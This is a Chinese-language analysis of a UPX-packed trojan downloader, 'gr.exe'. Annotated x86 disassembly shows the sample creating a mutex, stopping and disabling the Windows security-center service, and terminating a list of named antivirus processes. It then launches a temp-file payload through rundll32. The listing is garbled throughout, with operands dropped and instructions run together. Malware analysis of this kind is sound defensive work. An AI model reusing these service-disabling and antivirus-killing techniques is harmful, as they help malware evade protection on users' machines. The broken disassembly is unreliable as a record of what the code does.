文件: gr.exe大小: 29184 字节SHA1: 12C60FEFAE4865F8BFB8E9D169FA82A117F9BD1A加壳类型:UPX开发语言:Borland Delphi瑞星扫描:Trojan.DL.Win32.Small.zuq简单行为分析1.创建一个名为"abcf"的互斥体：
004039E068 2C344000 push0040342C ; ASCII "abcf"004039E56A 01 push1004039E753pushebx004039E8FF15 64104000 calldword ptr [; 创建一个名为"abcf"的互斥体004039EEFF15 60104000 calldword ptr [; ntdll.RtlGetLastWin32Error复制代码2.禁止"wscsvc"服务：
004043F755pushebp004043F88BECmov ebp, esp004043FA83EC 1C sub esp, 1C004043FD68 3F000F00 push0F003F004044026A 00 push000404404FF75 08 pushdword ptr 00404407FF15 34104000 calldword ptr [; 打开服务管理器0040440D85C0testeax, eax0040440F8945 08 mov dword ptr , eax0040441274 47 jeshort 0040445B0040441456pushesi0040441557pushedi0040441668 FF010F00 push0F01FF0040441BFF75 0C pushdword ptr 0040441E50pusheax0040441FFF15 04104000 calldword ptr [; 打开wscsvc服务004044258B3D 08104000 mov edi, dword ptr [; ADVAPI32.CloseServiceHandle0040442B8BF0mov esi, eax0040442D85F6testesi, esi0040442F74 23 jeshort 0040445400404431807D 10 00cmp byte ptr , 00040443574 0D jeshort 00404444004044376A 00 push0004044396A 00 push00040443B56pushesi0040443CFF15 24104000 calldword ptr [; ADVAPI32.StartServiceA00404442EB 0D jmp short 00404451004044448D45 E4 lea eax, dword ptr 0040444750pusheax004044486A 01 push10040444A56pushesi0040444BFF15 30104000 calldword ptr [; 通过ControlService函数操作停止并禁止wscsvc服务复制代码3.获取系统进程快照，将要查找的进程名字符串动态恢复到内存中后挂靠“.exe”，然后通过比较判断进程中是否存在“rstray.exe、rsnetsvr.exe、ccenter.exe、scanfrm.exe、ravmond.exe、ravtask.exe、rsmain.exe、rfwsrv.exe、ras.exe、kavstart.exe、kissvc.exe、kamilmon.exe、kpfw32.exe、kpfwsvc.exe、kwatch.exe、kaccore.exe”，如果存在则通过释放内存的方法结束进程
00403DD06A 00 push000403DD26A 02 push200403DD4E8 A5060000 call; 创建系统快照00403DD98BF0mov esi, eax00403DDB6A 01 push100403DDD897424 0C mov dword ptr , esi00403DE1FF15 A8104000 calldword ptr []; kernel32.Sleep00403DE783FE FF cmp esi, -100403DEA75 07 jnz short 00403DF300403DEC33C0xor eax, eax00403DEEE9 77010000 jmp 00403F6A00403DF353pushebx00403DF455pushebp00403DF58D4424 14 lea eax, dword ptr 00403DF957pushedi00403DFA50pusheax00403DFB56pushesi00403DFCC74424 20 28010>mov dword ptr , 12800403E04E8 6F060000 call ; 获取快照中的第一个进程句柄00403E09BB B0454000 mov ebx, 004045B000403E0E85C0testeax, eax00403E100F84 DD000000 je00403EF300403E1633EDxor ebp, ebp00403E188B3CAD 08334000 mov edi, dword ptr 00403E1F83C9 FF orecx, FFFFFFFF00403E2233C0xor eax, eax00403E2453pushebx00403E25F2:AE repne scas byte ptr es:00403E27F7D1not ecx00403E292BF9sub edi, ecx00403E2B8BC1mov eax, ecx00403E2D8BF7mov esi, edi00403E2F8BFBmov edi, ebx00403E31C1E9 02 shr ecx, 200403E34F3:A5 rep movs dword ptr es:, dword p>00403E368BC8mov ecx, eax00403E3883E1 03 and ecx, 300403E3BF3:A4 rep movs byte ptr es:, byte ptr>00403E3DE8 35FEFFFF call00403C77 ; 还原字符串到内存00403E4259pop ecx00403E43BF AC344000 mov edi, 004034AC; ASCII ".exe"00403E4883C9 FF orecx, FFFFFFFF00403E4B33C0xor eax, eax00403E4DF2:AE repne scas byte ptr es:00403E4FF7D1not ecx00403E512BF9sub edi, ecx00403E538BF7mov esi, edi00403E558BD1mov edx, ecx00403E578BFBmov edi, ebx00403E5983C9 FF orecx, FFFFFFFF00403E5CF2:AE repne scas byte ptr es:00403E5E8BCAmov ecx, edx00403E604Fdec edi00403E61C1E9 02 shr ecx, 200403E64F3:A5 rep movs dword ptr es:, dword p>00403E668BCAmov ecx, edx00403E6883E1 03 and ecx, 300403E6B85EDtestebp, ebp00403E6DF3:A4 rep movs byte ptr es:, byte ptr>00403E6F75 3A jnz short 00403EAB00403E718BFBmov edi, ebx00403E7383C9 FF orecx, FFFFFFFF00403E76F2:AE repne scas byte ptr es:00403E78F7D1not ecx00403E7A2BF9sub edi, ecx00403E7CB8 98444000 mov eax, 0040449800403E818BD1mov edx, ecx00403E838BF7mov esi, edi00403E858BF8mov edi, eax00403E8750pusheax00403E88C1E9 02 shr ecx, 200403E8BF3:A5 rep movs dword ptr es:, dword p>00403E8D8BCAmov ecx, edx00403E8F8D4424 40 lea eax, dword ptr 00403E9383E1 03 and ecx, 300403E9650pusheax00403E97F3:A4 rep movs byte ptr es:, byte ptr>00403E99FF15 88104000 calldword ptr [] ; 比较00403E9F85C0testeax, eax00403EA175 08 jnz short 00403EAB ; 如果不同跳00403EAB00403EA3C74424 10 01000>mov dword ptr , 100403EAB8BFBmov edi, ebx00403EAD83C9 FF orecx, FFFFFFFF00403EB033C0xor eax, eax00403EB2F2:AE repne scas byte ptr es:00403EB4F7D1not ecx00403EB649dec ecx00403EB783F9 06 cmp ecx, 600403EBA76 1A jbe short 00403ED600403EBC8D4424 3C lea eax, dword ptr 00403EC053pushebx00403EC150pusheax00403EC2FF15 88104000 calldword ptr [] ; 比较00403EC885C0testeax, eax00403ECA75 0A jnz short 00403ED6 ; 如果不同跳00403ED600403ECCFF7424 20 pushdword ptr 00403ED0E8 86FEFFFF call00403D5B ; 如果上述进程存在则顺序走到这，通过VirtualFreeEx释放内存结束进程00403ED559pop ecx00403ED645inc ebp00403ED783FD 12 cmp ebp, 1200403EDA^ 0F8E 38FFFFFF jle 00403E1800403EE08D4424 18 lea eax, dword ptr 00403EE450pusheax00403EE5FF7424 18 pushdword ptr 00403EE9E8 84050000 call ; 获取下一个进程句柄00403EEE^ E9 1BFFFFFF jmp 00403E0E; 跳00403E0E进行下一个比较复制代码4.创建一个线程，主线程挂起
00403F8FFF15 98104000 calldword ptr [401098] ; 创建线程00403F958BF0mov esi, eax00403F976A FF push-100403F9956pushesi00403F9AFF15 94104000 calldword ptr [401094] ; 等待线程退出复制代码线程执行获取临时文件夹目录，GetTickCount获取系统开机时间数挂靠“.t”后得到一个随机数文件名~1476b8.t，临时文件夹创建文件，解密字符串得到命令行“%temp%\~1476b8.t,AboutDlgProc 18”，通过解密字符串得到avp.exe、safeboxtray.exe、360tray.exe进程名，查找进程中是否存在以上进程，如果有则创建进程rundll32.exe执行命令行
0040422BFF15 58104000 calldword ptr [; 获取临时文件夹目录00404231FF15 54104000 calldword ptr [; 获取系统开机时间数0040423783C0 03 add eax, 30040423A50pusheax0040423B8D85 58FCFFFF lea eax, dword ptr 0040424150pusheax004042428D85 5CFDFFFF lea eax, dword ptr 0040424868 34354000 push00403534 ; %s~%x.t0040424D50pusheax0040424EFF15 FC104000 calldword ptr []; USER32.wsprintfA004042548D85 5CFDFFFF lea eax, dword ptr 0